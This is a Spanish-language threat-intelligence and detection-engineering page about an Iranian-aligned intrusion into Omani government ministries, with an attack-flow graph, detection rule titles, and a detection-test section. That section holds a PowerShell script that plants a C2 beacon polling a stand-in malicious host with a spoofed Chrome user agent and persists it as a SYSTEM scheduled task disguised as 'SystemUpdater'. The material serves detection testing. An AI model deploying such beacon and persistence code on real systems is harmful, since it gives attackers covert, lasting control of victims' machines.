Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Un actor de amenaza alineado con el estado iraní comprometió múltiples ministerios gubernamentales en Omán utilizando webshells, exploits de ProxyShell y un entorno personalizado de comando y control alojado en un VPS basado en EAU. Los atacantes exfiltraron más de 26,000 registros de usuarios e hives del registro, luego desplegaron herramientas posteriores al compromiso incluyendo Chisel y GodPotato para profundizar el acceso. La operación fue expuesta aún más por un directorio abierto que reveló inadvertidamente las herramientas, scripts y registros C2 de los atacantes, proporcionando visibilidad del ciclo de vida completo de la intrusión.
Investigación
Investigadores accedieron al VPS expuesto en 172.86.76.127 e identificaron webshells, scripts de comando y control basados en Python, herramientas de escalamiento de privilegios y múltiples scripts de explotación dirigidos a ProxyShell y la vulnerabilidad DNN SSRF. Los registros de red mostraron actividad de beaconing sobre los puertos 8001 and 8002, junto con el uso de túneles Chisel para acceso encubierto. La investigación también documentó la creación de tareas programadas, la extracción de hives de registro y el volcado de datos a gran escala de los sistemas comprometidos.
Mitigación
Las organizaciones deben aplicar todos los parches relacionados con ProxyShell en Microsoft Exchange y remediar el problema DNN SSRF rastreado como CVE-2025-32372. Las aplicaciones web deben ser fortalecidas, las cuentas de IIS deben ejecutarse con el menor privilegio, y las páginas de ASP.NET no utilizadas deben ser deshabilitadas en la medida de lo posible. Los defensores también deben desplegar firewalls de aplicaciones web, monitorear el tráfico saliente en puertos inusuales y revisar regularmente los servidores expuestos a Internet en busca de directorios abandonados o expuestos.
Respuesta
Los equipos de seguridad deben crear detecciones para patrones de acceso a webshells, comportamiento de beaconing en PowerShell, actividad de túneles Chisel y creación sospechosa de tareas programadas. Los respondedores de incidentes deben recolectar registros de servidores web, hives del registro y cualquier volcado de bases de datos para análisis forense. Los sistemas afectados deben ser aislados, las credenciales rotadas, y las autoridades o partes interesadas de Omán relevantes deben ser notificadas sin demora.
"graph TB %% Class Definitions Section classDef technique fill:#c2e0ff classDef tool fill:#cccccc %% Node Definitions u2013 Techniques initial_access["<b>Technique</b> – <b>T1190 Exploit Public-Facing Application</b><br/>Method: ProxyShell & DNN SSRF"] class initial_access technique remote_services["<b>Technique</b> – <b>T1210 Exploitation of Remote Services</b><br/>Lateral movement"] class remote_services technique web_shell["<b>Technique</b> – <b>T1505.003 Web Shell</b><br/>Deployed: hc2.aspx / health_check_t.aspx"] class web_shell technique c2_bidir["<b>Technique</b> – <b>T1102.002 Web Service Bidirectional Communication</b><br/>HTTP C2 server"] class c2_bidir technique tunneling["<b>Technique</b> – <b>T1572 Protocol Tunneling</b> & <b>T1219.001 IDE Tunneling</b><br/>Tool: Chisel"] class tunneling technique weaken_enc["<b>Technique</b> – <b>T1600 Weaken Encryption</b><br/>Applied to tunnel"] class weaken_enc technique priv_esc["<b>Technique</b> – <b>T1134.003 Access Token Manipulation</b> & <b>T1068 Exploitation for Privilege Escalation</b><br/>Tool: GodPotato"] class priv_esc technique account_manip["<b>Technique</b> – <b>T1098 Account Manipulation</b><br/>Maintain elevated rights"] class account_manip technique cred_access["<b>Technique</b> – <b>T1012 Query Registry</b><br/>Steal SAM/System hives"] class cred_access technique def_evasion["<b>Technique</b> – <b>T1562 Impair Defenses</b> & <b>T1668 Exclusive Control</b><br/>Disable AV"] class def_evasion technique discovery["<b>Technique</b> – <b>T1592.002 Gather Victim Host Info</b> & <b>T1590.001 Network Domain Properties</b>"] class discovery technique exfiltration["<b>Technique</b> – <b>T1041 Exfiltration Over C2 Channel</b> & <b>T1030 Data Transfer Size Limits</b>"] class exfiltration technique oneway["<b>Technique</b> – <b>T1102.003 One-Way Web Service Communication</b><br/>Result posting"] class oneway technique %% Node Definitions u2013 Tools / Malware tool_proxyshell["<b>Tool</b> – <b>Name</b>: ProxyShell<br/><b>Purpose</b>: Exploit Exchange Server"] class tool_proxyshell tool tool_chisel["<b>Tool</b> – <b>Name</b>: Chisel<br/><b>Purpose</b>: Tunneling"] class tool_chisel tool tool_godpotato["<b>Tool</b> – <b>Name</b>: GodPotato<br/><b>Purpose</b>: Privilege escalation"] class tool_godpotato tool %% Connections u2013 Attack Flow initial_access –>|leads_to| remote_services initial_access –>|uses| tool_proxyshell remote_services –>|leads_to| web_shell web_shell –>|enables| c2_bidir c2_bidir –>|uses| tunneling tunneling –>|uses| tool_chisel tunneling –>|enables| weaken_enc weaken_enc –>|enables| priv_esc priv_esc –>|uses| tool_godpotato priv_esc –>|enables| account_manip account_manip –>|enables| cred_access cred_access –>|enables| def_evasion def_evasion –>|enables| discovery discovery –>|enables| exfiltration exfiltration –>|uses| oneway "
Flujo de Ataque
Detecciones
La Posibilidad de Ejecución a Través de Líneas de Comando PowerShell Ocultas (vía cmdline)
Ver
Descarga o Carga a través de PowerShell (vía cmdline)
Ver
Posible Enumeración o Manipulación de Cuentas o Grupos (vía cmdline)
Ver
LOLBAS Schtasks (vía cmdline)
Ver
IOCs (HashSha256) para detectar: Operación del Nexo Iraní Contra el Gobierno de Omán: 12 Ministerios Afectados y 26,000 Registros de Ciudadanos Expuestos
Ver
IOCs (SourceIP) para detectar: Operación del Nexo Iraní Contra el Gobierno de Omán: 12 Ministerios Afectados y 26,000 Registros de Ciudadanos Expuestos
Ver
IOCs (DestinationIP) para detectar: Operación del Nexo Iraní Contra el Gobierno de Omán: 12 Ministerios Afectados y 26,000 Registros de Ciudadanos Expuestos
Ver
Detección de Webshells hc2.aspx y health_check_t.aspx y Explotación de ProxyShell [Servidor Web]
Ver
Detección de Sondeo de Comando PowerShell y Exfiltración a través de Usuario-Agente Falseado de Chrome [Windows Powershell]
Ver
Ejecución de Simulación
Prerrequisito: La Verificación de Telemetría y Pre-vuelo debe haber pasado.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico incorrecto.
-
Narrativa del Ataque y Comandos:
El atacante ya ha establecido un punto de apoyo en la máquina víctima y desea establecer un beacon C2 de bajo ruido. Dejan caer el script de PowerShell new_beacon.ps1 en la carpeta AppData del usuario. El script se ejecuta en un bucle infinito, sondeando un C2 remoto cada 30 segundos. Cada solicitud HTTP se elabora con una cadena de Usuario-Agente de Chrome para mezclarse con el tráfico web normal, evadiendo así las detecciones basadas en la red (T1217, T1674). El atacante inicia el beacon a través de una tarea programada para asegurar la persistencia (T1204.004). -
Script de Prueba de Regresión:
# ------------------------------------------------- # Implementar y ejecutar el beacon de PowerShell new_beacon # ------------------------------------------------- $beaconPath = "$env:APPDATAnew_beacon.ps1" $c2Url = "http://malicious.example.com/beacon" # 1. Escribir el script del beacon (versión ligera simulada) $scriptContent = @' while ($true) { $headers = @{ "User-Agent" = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36" } try { Invoke-WebRequest -Uri "$using:c2Url" -Headers $headers -Method GET -TimeoutSec 10 | Out-Null } catch {} Start-Sleep -Seconds 30 } '@ Set-Content -Path $beaconPath -Value $scriptContent -Encoding UTF8 # 2. Registrar una tarea programada para persistencia (se ejecuta cada minuto) $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoProfile -ExecutionPolicy Bypass -File `"$beaconPath`"" $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration ([TimeSpan]::MaxValue) $principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest Register-ScheduledTask -TaskName "SystemUpdater" -Action $action -Trigger $trigger -Principal $principal -Force Write-Host "Beacon desplegado y tarea programada creada." -
Comandos de Limpieza:
# ------------------------------------------------- # Eliminar el beacon y la tarea programada # ------------------------------------------------- $beaconPath = "$env:APPDATAnew_beacon.ps1" Unregister-ScheduledTask -TaskName "SystemUpdater" -Confirm:$false Remove-Item -Path $beaconPath -Force -ErrorAction SilentlyContinue Write-Host "Limpieza completada."